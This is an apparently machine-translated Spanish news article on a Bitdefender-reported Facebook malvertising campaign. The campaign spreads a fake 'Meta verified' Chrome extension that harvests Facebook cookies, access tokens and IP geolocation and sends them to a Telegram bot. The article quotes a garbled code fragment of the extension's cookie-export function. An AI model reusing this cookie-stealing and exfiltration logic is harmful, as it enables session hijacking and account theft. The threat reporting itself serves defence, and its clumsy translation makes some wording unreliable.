Los actores maliciosos han lanzado una sofisticada campaña de malvertimiento en Facebook que obliga a los usuarios desprevenidos a instalar una extensión de navegador “meta verificada” falsa.
Promocionados a través de tutoriales de video aparentemente legítimos, estos anuncios prometen desbloquear la codiciada tick de verificación azul sin pagar la tarifa de suscripción de Meta.
En realidad, la extensión está diseñada para cosechar datos de usuario confidenciales, incluidas cookies de sesión, tokens de acceso y direcciones IP.
Al aprovechar plataformas de confianza como Box.com para alojamiento, los atacantes aseguran una alta disponibilidad y evaden defensas simples de bloqueo de URL, lo que hace que la estafa parezca auténtica y libre de riesgos.
Tras una inspección más cercana, los videos tutoriales que acompañan a los anuncios llevan las huellas digitales de los actores de amenaza de habla vietnamita, con narración y comentarios de código escritos en vietnamitas.
El código de la extensión, aunque torpemente ofuscado y probablemente generado por un conjunto de herramientas asistido por AI-AI, todavía exfiltra los datos.
Analistas de Bitdefender identificado El uso de la API del gráfico de Facebook para consultar la información de la cuenta comercial una vez que se adquieren tokens de acceso válidos, lo que permite a los atacantes distinguir los perfiles corporativos de alto valor de las cuentas personales.
AD de extensión del navegador malicioso (Fuente – Bitdefender)
Las víctimas que siguen el tutorial otorgan involuntariamente los permisos de extensión para leer y exportar cookies del dominio Facebook.com.
Una vez instalada, la extensión invoca inmediatamente una función de Exportcookies que compila cada cookie en una cadena formateada antes de transmitirla a un bot de telegrama controlado por los atacantes.
Función de exportación de cookies (fuente – bitdefender)
Para personalizar aún más los datos robados, el malware consulta https://ipinfo.io/json para agregar detalles de geolocalización, reforzando su comercialización en foros subterráneos.
Los investigadores de Bitdefender señalaron que las variantes de esta extensión incluyen parámetros ajustables para el tamaño y la posición de la garrapata, lo que sugiere una tubería automatizada para generar nuevos activos de campaña con un esfuerzo manual mínimo.
El diseño modular también admite la ejecución automática al inicio de Chrome, asegurando la cosecha persistente de datos incluso si los usuarios deshabilitan y vuelven a habilitar la extensión.
Mecanismo de infección Dive Deep Dive
El núcleo del mecanismo de infección se encuentra en el script de fondo de la extensión maliciosa, que se inclina en la API de cookies de Chrome para extraer tokens de sesión sin activar las indicaciones del usuario.
Después de la instalación, activado haciendo clic en un enlace de anuncios, la extensión usa chrome.cookies.getall ({dominio: “facebook.com”}, devolución de llamada) para recopilar cookies.
Dentro de la devolución de llamada, construye la carga útil:-
ASYNC Function exportcookies () {chrome.cookies.getall ({domain: “facebook.com”}, async cookies => {const CookeDerRing = cookies. Map (c => `$ {c.name} = $ {c.value}`) .Join (“;”); const userID = cookies. Find (c => c.name === “. “Desconocido”; SendTotelegram (carga útil); }
Este enfoque optimizado evita muchas detecciones basadas en puntos finales, mientras que el uso de dominios legítimos para alojamiento y comando y control reduce la probabilidad de eliminación rápida.
Los equipos de seguridad deben monitorear la actividad anormal de la exportación de cookies y hacer cumplir la expectativa de extensión rigurosa para defenderse de tales amenazas de malvertición industrializada.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
